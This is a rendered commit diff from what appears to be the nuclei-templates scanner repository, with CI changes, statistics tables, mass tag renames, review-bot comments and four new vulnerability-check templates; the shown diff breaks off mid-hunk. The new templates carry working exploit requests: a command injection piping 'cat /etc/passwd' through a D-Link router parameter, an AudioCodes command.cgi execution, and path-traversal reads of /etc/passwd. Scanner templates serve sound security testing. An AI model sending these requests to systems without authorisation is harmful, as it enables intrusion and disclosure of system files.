commit
cd174d96fa
|
@ -23,11 +23,11 @@ jobs:
|
|||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t .
|
||||
# nuclei -validate -w ./workflows # Disabling temporarily
|
||||
nuclei -validate -w ./workflows
|
||||
shell: bash
|
|
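Review bot: Both `@master` and `@dev` in `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev` are moving branch refs, so every run of this validation job fetches and builds whatever sits at the branch tip at that moment; results are not reproducible and the job silently inherits any change, or compromise, that lands on that branch. Pin to a released tag or a full commit hash, e.g. `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@<pinned-tag-or-sha>`, and bump it deliberately when a new validator version is wanted. The same applies to `actions/checkout@master` in the next hunk, where a full-SHA pin is the usual recommendation. The job definition starts before this hunk.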
@ -2,14 +2,12 @@ name: 🗒 Templates Stats
|
|||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
|
|
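Review bot: If `if: github.repository == 'projectdiscovery/nuclei-templates'` is the line being dropped in favour of `if: ${{ startsWith(github.ref, 'refs/tags/v') }}`, the stats job will now also run in every fork that creates a `v*` tag, which the repository check previously prevented; keeping both conditions, `if: github.repository == 'projectdiscovery/nuclei-templates' && startsWith(github.ref, 'refs/tags/v')`, preserves that guard. The rendered page does not show which of the two `if:` lines is the new side, so confirm against the raw diff. The ref check is presumably needed because the `tags:` filter under `on.create` does not appear to be honoured for the `create` event, leaving the `if` as the only effective tag restriction. Separately, `uses: actions/checkout@master` in the context lines is an unpinned moving ref.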
20
README.md
20
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 |
|
||||
| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 |
|
||||
| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | |
|
||||
| rce | 214 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 165 | madrobot | 63 | file | 50 | | | | |
|
||||
|
||||
**175 directories, 2366 files**.
|
||||
**176 directories, 2382 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
1801
TEMPLATES-STATS.md
1801
TEMPLATES-STATS.md
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
|
||||
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
|
||||
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
|
||||
| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 |
|
||||
| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 |
|
||||
| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 |
|
||||
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
|
||||
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
|
||||
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
|
||||
| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | |
|
||||
| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | |
|
||||
| rce | 214 | gy741 | 81 | takeovers | 65 | | | | |
|
||||
| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | |
|
||||
| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 165 | madrobot | 63 | file | 50 | | | | |
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf,oob
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf,oast
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
|
||||
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
|
||||
tags: cve,cve2015,websphere,deserialization,rce,oob
|
||||
tags: cve,cve2015,websphere,deserialization,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
|
||||
tags: cve,cve2015,ssrf,oob
|
||||
tags: cve,cve2015,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
|
||||
cvss-score: 8.20
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oob
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Apache Solr <= 7.1 XML entity injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2017,solr,apache,oob,xxe
|
||||
tags: cve,cve2017,solr,apache,oast,xxe
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||
- https://twitter.com/honoki/status/1298636315613974532
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://github.com/graphite-project/graphite-web/issues/2008
|
||||
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
|
||||
tags: cve,cve2017,graphite,ssrf,oob
|
||||
tags: cve,cve2017,graphite,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pdteam
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
severity: high
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oob
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oast
|
||||
reference:
|
||||
- https://hackerone.com/reports/810778
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
|
||||
- https://ecosystem.atlassian.net/browse/OAUTH-344
|
||||
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
|
||||
tags: cve,cve2017,atlassian,jira,ssrf,oob
|
||||
tags: cve,cve2017,atlassian,jira,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2018,jenkins,ssrf,oob
|
||||
tags: cve,cve2018,jenkins,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-10093
|
||||
|
||||
info:
|
||||
name: AudioCode 400HD - RCE
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46164
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10093
|
||||
tags: cve,cve2018,rce,iot
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2018-10093
|
||||
cwe-id: CWE-862
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/command.cgi?cat%20/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "admin:.*:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
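Review bot: The body matcher `- "admin:.*:"` is loose: any page that contains `admin:` followed later by a colon (login forms, JSON, log output) satisfies it together with a 200, so this template will raise false positives on hosts that are not affected. The other new templates in this commit (CVE-2018-10823, CVE-2018-12054, CVE-2018-13980) anchor on `- "root:.*:0:0"`, which identifies an actual passwd file; use the same here. The `info` block is also inconsistent with itself: `name` says `AudioCode 400HD` while `description` says `AudioCodes IP phone 420HD`; align the vendor spelling and model with the advisory already listed under `reference`.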
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
tags: cve,cve2018,lg-nas,rce,oob
|
||||
tags: cve,cve2018,lg-nas,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-10823
|
||||
|
||||
info:
|
||||
name: D-Link Routers - Command Injection
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45676
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10823
|
||||
tags: cve,cve2018,rce,iot,dlink,router
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2018-10823
|
||||
cwe-id: CWE-78
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
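Review bot: `description` states that an authenticated attacker is required and `cvss-metrics` carries `PR:L`, yet the single GET in `requests` sends no credentials, so the template can only match devices on which `chkisg.htm` is reachable without a login. Say so in the description, e.g. append `This check only fires where the page is exposed pre-authentication.`, so a negative result on an authenticated device is not read as "not vulnerable".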
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-12054
|
||||
|
||||
info:
|
||||
name: Schools Alert Management Script - Arbitrary File Read
|
||||
author: wisnupramoedya
|
||||
severity: high
|
||||
description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44874
|
||||
- https://www.cvedetails.com/cve/CVE-2018-12054
|
||||
tags: cve,cve2018,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2018-12054
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-13980
|
||||
|
||||
info:
|
||||
name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
|
||||
author: wisnupramoedya
|
||||
severity: medium
|
||||
description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45016
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-13980
|
||||
tags: cve,cve2018,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.50
|
||||
cve-id: CVE-2018-13980
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
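Review bot: `cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` declares a local attack vector with privileges required, but the `description` in the same block says the sites are vulnerable to unauthenticated file disclosure and the request is a plain unauthenticated GET; one of the two is wrong. Verify the vector and the `5.50` score against the NVD entry linked under `reference` and correct whichever side disagrees, since downstream consumers filter on the classification fields.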
@ -7,7 +7,7 @@ info:
|
|||
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||
author: gy741
|
||||
severity: high
|
||||
tags: cve,cve2018,dlink,ssrf,oob
|
||||
tags: cve,cve2018,dlink,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
|
||||
cvss-score: 8.60
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/49918
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
|
||||
tags: cve,cve2018,logontracer,rce,oob
|
||||
tags: cve,cve2018,logontracer,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||
- https://paper.seebug.org/1009/
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
tags: cve,cve2019,apache,rce,solr,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: pikpikcu,madrobot
|
||||
severity: high
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
tags: cve,cve2019,apache,rce,solr,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.50
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://swarm.ptsecurity.com/openfire-admin-console/
|
||||
- https://github.com/igniterealtime/Openfire/pull/1497
|
||||
tags: cve,cve2019,ssrf,openfire,oob
|
||||
tags: cve,cve2019,ssrf,openfire,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
tags: cve,cve2019,oracle,xxe,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
tags: cve,cve2019,oracle,xxe,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69793
|
||||
- https://hackerone.com/reports/713900
|
||||
tags: cve,cve2019,atlassian,jira,ssrf,oob
|
||||
tags: cve,cve2019,atlassian,jira,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
||||
cvss-score: 6.50
|
||||
|
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 5.30
|
||||
cve-id: CVE-2020-10770
|
||||
cwe-id: CWE-601
|
||||
tags: keycloak,ssrf,oob,cve,cve2020
|
||||
tags: keycloak,ssrf,oast,cve,cve2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
|
||||
reference:
|
||||
- https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
|
||||
tags: cve,cve2020,wavlink,rce,oob
|
||||
tags: cve,cve2020,wavlink,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
|
||||
reference:
|
||||
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
|
||||
tags: cve,cve2020,sophos,rce,oob
|
||||
tags: cve,cve2020,sophos,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
|
||||
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||
tags: cve,cve2020,dlink,rce,oob
|
||||
tags: cve,cve2020,dlink,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
|
||||
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||
tags: cve,cve2020,netgear,rce,oob
|
||||
tags: cve,cve2020,netgear,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
||||
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
|
||||
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
|
||||
tags: cve,cve2020,terramaster,rce,oob
|
||||
tags: cve,cve2020,terramaster,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
|
||||
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
|
||||
- https://www.exploit-db.com/exploits/48980
|
||||
tags: cve,cve2020,monitorr,rce,oob
|
||||
tags: cve,cve2020,monitorr,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/49189
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
|
||||
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
|
||||
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
|
||||
tags: cve,cve2020,linksys,rce,oob,router
|
||||
tags: cve,cve2020,linksys,rce,oast,router
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
|
||||
tags: cve,cve2020,sap,ssrf,oob
|
||||
tags: cve,cve2020,sap,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: princechaddha
|
||||
severity: critical
|
||||
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
|
||||
reference:
|
||||
- https://www.adminxe.com/2183.html
|
||||
tags: cve,cve2020,zimbra,ssrf,oob
|
||||
tags: cve,cve2020,zimbra,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oob
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1390300625129201664
|
||||
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
|
||||
tags: cve,cve2021,cisco,rce,oob
|
||||
tags: cve,cve2021,cisco,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1390300625129201664
|
||||
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
|
||||
